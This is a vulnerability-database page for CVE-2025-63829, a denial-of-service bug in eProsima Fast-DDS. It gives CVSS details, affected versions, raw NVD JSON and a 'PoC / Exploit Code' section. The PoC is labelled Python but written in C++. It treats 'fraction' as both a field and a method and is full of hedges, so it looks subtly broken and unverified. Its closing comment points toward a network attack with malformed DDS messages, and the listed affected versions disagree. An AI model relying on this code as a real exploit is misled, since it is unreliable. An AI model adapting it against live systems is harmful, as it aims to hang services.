Security Vulnerability Report
中文
CVE-2025-63829 CVSS 7.5 HIGH

CVE-2025-63829

Published: 2025-11-18 17:16:13
Last Modified: 2025-12-31 02:09:58

Description

eProsima Fast-DDS v3.3 and before has an infinite loop vulnerability caused by integer overflow in the Time_t:: fraction() function.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:eprosima:fast_dds:*:*:*:*:*:*:*:* - VULNERABLE
eProsima Fast-DDS < 3.3
eProsima Fast-DDS <= v3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2025-63829: eProsima Fast-DDS Time_t::fraction() Integer Overflow // This PoC demonstrates triggering the infinite loop via crafted Time_t data #include <fastrtps/rtps/rtps_fwd.h> #include <fastrtps/utils/Time_t.h> using namespace eprosima::fastrtps; int main() { // Create a Time_t object with potentially malicious fraction value Time_t malicious_time; // Set seconds to a value that may cause overflow when combined with fraction malicious_time.seconds = 0; // Attempt to set fraction to a value that could trigger integer overflow // The exact trigger value depends on the implementation details // This is a simplified demonstration malicious_time.fraction = 0xFFFFFFFF; // Max uint32_t value // Call the vulnerable fraction() function // This may cause integer overflow and infinite loop try { uint32_t result = malicious_time.fraction(); // If we reach here without hanging, the overflow wasn't triggered std::cout << "Result: " << result << std::endl; } catch (...) { std::cout << "Exception caught - possible overflow" << std::endl; } return 0; } // Alternative: Network-based trigger via malformed DDS message // In a real attack scenario, send a DDS message with Time_t field // containing values that will trigger the overflow when processed

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63829", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:12.907", "lastModified": "2025-12-31T02:09:57.753", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "eProsima Fast-DDS v3.3 and before has an infinite loop vulnerability caused by integer overflow in the Time_t:: fraction() function."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-835"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eprosima:fast_dds:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.3.0", "matchCriteriaId": "E3408CCE-0712-4A72-871F-B31ECF9E27C3"}]}]}], "references": [{"url": "https://gist.github.com/lkloliver/b00377bec754d4aa1dc731be210d5889", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Mitigation"]}, {"url": "https://github.com/eProsima/Fast-DDS/blob/master/src/cpp/fastdds/core/Time_t.cpp#L67", "source": "[email protected]", "tags": ["Product"]}]}}